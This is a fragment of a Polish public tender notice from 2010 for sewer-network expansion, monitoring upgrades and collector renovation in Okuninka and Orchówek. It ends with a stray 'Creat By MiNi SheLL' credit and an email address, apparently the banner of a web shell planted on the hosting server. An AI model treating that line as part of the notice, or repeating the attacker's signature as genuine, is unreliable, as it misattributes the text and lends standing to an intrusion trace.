b)Kosztorys ofertowy dla każdego zadnia opracowany metodą uproszczoną wraz z zestawieniem cen jednostkowych materiałów, czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz stawki jednostkowe pracy podstawowego sprzętu i urządzeń, które Wykonawca będzie używał do wykonania przedmiotu zamówienia.
c )Wzory podpisów osoby ( lub osób ) uprawnionej do składania oświadczeń woli lub innych dokumentów :
1) podpis skrócony tzw. Parafa ze wskazaniem osoby, której jest własnością,
2) podpis czytelny : imię i nazwisko lub tylko nazwisko.
e) wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni załączyć do oferty oryginał pełnomocnictwa celem ustalenia:
- Wykonawcy - pełnomocnika uprawnionego do występowania w imieniu grupy wykonawców,
- Wykonawców ubiegających się wspólnie o przedmiotowe zamówienie publiczne (wymienionych z nazwy z określeniem adresu siedziby).
Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Dokument pełnomocnictwa powinien zostać podpisany przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym wykonawcę pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
Zapisy dotyczące uwag odnośnie formy składanych dokumentów oraz dokumentów wymaganych od wykonawcy mającego siedzibę lub miejsce zamieszkania za granicą stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany w umowie w stosunku do treści oferty w zakresie terminu realizacji zadania :
a) jeżeli wystąpi nieterminowe przekazanie terenu budowy przez Zamawiającego, a opóźnienie to będzie miało wpływ na terminowe wykonanie przedmiotu umowy,
b) jeżeli wystąpiła konieczność wykonania zamówień dodatkowych w okolicznościach wymienionych w § 67 ust. 5,
c) na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania zamówienia,
d) na skutek wykopalisk uniemożliwiających wykonanie robót,
e) na skutek jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać Zamawiającemu lub innemu Wykonawcy zatrudnionemu przez Zamawiającego na terenie budowy,
f) Wykonawcy przysługuje prawo do zmiany terminu wykonania przedmiotu umowy o czas opóźnienia Zamawiającego, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy, w wykonaniu następujących zobowiązań:
1) przekazania dokumentów budowy, do których Zamawiający był zobowiązany,
2) zmiany terminu dokonania prób końcowych,
W celu dokonania przewidzianych w umowie zmian należy podać : sposób ich inicjowania, sposób wprowadzania i możliwe skutki. Inicjowanie może nastąpić przez Zamawiającego albo Wykonawcę poprzez złożenie wniosku pisemnego. Wniosek taki powinien zawierać:
1) opis zmiany,
2) uzasadnienie zmiany,
3) koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4) czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem ) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektor Nadzoru oraz Kierownik budowy.
2. Zamawiający przewiduje możliwość dokonania zmiany w umowie w stosunku do treści oferty w zakresie ceny:
a) jeżeli w trakcie trwania umowy zmianie ulegnie urzędowa stawka VAT na roboty budowlane, 
3. Wszelkie zmiany wymagają formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spolkawodna.wlodawa.pl/ w zakładce Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółka Wodno - Ściekowa /Jezioro Białe- Glinki/
    z/s w Orchówku , Orchówek 
ul. Nadbużańska 81 , 22-200 Włodawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2010 godzina 12:00, miejsce: Spółka Wodno - Ściekowa /Jezioro Białe- Glinki/
    z/s w Orchówku , Orchówek 
ul. Nadbużańska 81 , 22-200 Włodawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.03.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT DOFINANSOWANY Z REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA LUBELSKIEGO NA LATA 2007 - 2013, 
OŚ PRIORYTETOWA VI ŚRODOWISKO I CZYSTA ENERGIA
DZIAŁANIE 6.1 OCHRONA I KSZTAŁTOWANIE ŚRODOWISKA
KATEGORIA I : GOSPODARKA WODNO-ŚCIEKOWA.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 2
Rozbudowa i modernizacja sieci kanalizacji sanitarnej podciśnieniowej oraz przepompowni ścieków PI  próżniowo-tłocznej dla msc. Okuninka-Orchówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja:
 msc. Okuninka, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
		działki nr ewid.: 146/11, 146/1, 147, 214/12, 214/14, 214/5, 233, 247/2, 247/3, 247/4, 248/30, 248/51, 259, 261/2, 261/3, 262/9, 263/6, 264/7, 265/8, 274/48, 1418/1, 1419/7, 1420, 185/2, 138, 149, 152, 183, 145/2, 146/6, 224, 274/4, 192, 184, 148/2, 274/81, 445, 
w msc. Orchówek działka nr ewid. 541; 
Stan istniejący:
	W msc. Okuninka funkcjonuje sieć kanalizacji   sanitarnej w systemie grawitacyjno-podciśnieniowym. Ścieki sanitarne są odprowadzane do istniejącej pompowni próżniowo-tłocznej PI zlokalizowanej w msc. Okuninka, a z niej ścieki są przetłaczane układem dwóch równoległych rurociągów tłocznych do systemu kanalizacyjnego w msc. Orchówek. Z istniejacej pompowni ścieków PII  ścieki są przetłaczane do kanalizacji sanitarnej w msc. Włodawa, a następnie do oczyszczalni ścieków.
 Elementy do wykonania:
 - Wykonanie  i modernizacja sieci kanalizacji sanitarnej podciśnieniowej w msc. Okuninka i  Orchówek ( J.Glinki ).
Zakres robót obejmuje:
a) wykonanie sieci kanalizacji sanitarnej podciśnieniowej w msc. Okuninka i Orchówek 
    ( J. Glinki ) o długości L= 4.281 m ,
b) wykonanie dwóch przejść nad rzeką Tarasienka ,
c) wykonanie modernizacji istniejącej sieci kanalizacji sanitarnej podciśnieniowej (montaż armatury sieciowej).
 - Modernizacja przepompowni ścieków próżniowo-tłocznej PI dla msc. Okuninka.
Zakres robót obejmuje:
a) wykonanie modernizacji części technologicznej- rozbudowa stacji pomp ,
b) wykonanie modernizacji instalacji elektrycznej wewnętrznej oraz układów sterowania  i   AKPiA ,
c)  modernizacja budynku technicznego z dyspozytornią -roboty budowlane ,
d) remont budynku przepompowni PI ,
e) przebudowa i modernizacja dróg i placów wewnętrznych na terenie pompowni PI..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 4
Rozbudowa systemu monitoringu kanalizacji i wodociągów oraz zarządzania przedsiębiorstwem w msc. Okuninka-Orchówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja: msc. Okuninka, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
		działki nr ewid. 146/11, 146/1, 147, 214/12, 214/14, 214/5, 233, 247/2, 247/3, 247/4, 248/30, 248/51, 259, 261/2, 261/3, 262/9, 263/6, 264/7, 265/8, 274/48, 1418/1, 1419/7, 1420, 185/2, 138, 149, 152, 183, 145/2, 146/6, 224, 274/4, 192, 184, 148/2, 274/81, 445, 
w msc. Orchówek działka nr ewid. 541, 542, 544, 546, 545/36, 545/61, 545/63, 543/7, 1338, 545/4
Stan istniejący:
Na terenie przepompowni PI w Okunince w budynku energetycznym zlokalizowana jest centralna dyspozytornia monitoringu wyposażona w  szafę wizualizacji i komputer sterujący. Do centralnej dyspozytorni podłączone są :
- 23 funkcjonujące skrzynki sygnalizacyjno - monitorujące zlokalizowane przy istniejących komorach zaworowych sieci kanalizacji podciśnieniowej,
- przepompownie ścieków zlokalizowane wokół  j. Białego Pz1, Pz2, Pz3, Pz4 i PII w Orchówku
- stacje ujęcia wody - studnie głębinowe nr 2 i nr 3.
Elementy do wykonania:
- Rozbudowa i modernizacja monitoringu dla stacji wodociągowej oraz studni  Nr I,II,III,IV i V.
- Rozbudowa i modernizacja monitoringu dla kanalizacji podciśnieniowej 
a) rozbudowa dla nowej sieci kanalizacji podciśnieniowej wraz z komorami zaworowymi KZ w msc. Okuninka - Orchówek ( J.Glinki ) , L = 5817,0m.
b) modernizacja istniejących szafek przekaźnikowych przy istniejących studniach zaworowych KZ w Okunince szt. 23
- Przebudowa rozdzielni i wizualizacji w dyspozytorni  przepompowni ścieków PI w     Okunince 
- Przebudowa odcinka kabla sterowniczego pomiędzy pompowniami ścieków PI (Okuninka-J. Białe ) i PII ( Orchówek - J.Glinki ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.96.10.00-0, 45.21.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 5
 Modernizacja (renowacja bezwykopowa) kolektora Dn 0,6-0,8 m w Orchówku (j.Glinki), L=419 m.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja: msc. Orchówek, gm. Włodawa, pow. Włodawa, woj. lubelskie , 
	       działki nr ewid. 545/61, 540, 545/28
Stan istniejący:
Istniejąca sieć grawitacyjnej kanalizacji sanitarnej przebiegająca w msc. Orchówek na terenie zespołu rekreacyjnego nad j. Glinki wykonana jest z przewodów żelbetowych Dn 0,6-0,8 m. Na niektórych  odcinkach występują drobne uszkodzenia np. postaci nieszczelnych złączy lub włoskowatych rys na ściankach. Występują też nieszczelności w żelbetowych studzienkach kanalizacyjnych. Przed wykonaniem opracowania projektowego w kwietniu 2009 r. zostały wykonane prace przygotowawcze polegające na  oczyszczeniu całości sieci oraz wykonaniu inspekcji CCTV.
Elementy do wykonania:
-uszczelnienie istniejącego kolektora kanalizacji sanitarnej o średnicach Dn 0,6 - 0,8 m wraz ze studzienkami kanalizacyjnymi na odcinku L= 419 m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-8, 45.23.13.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com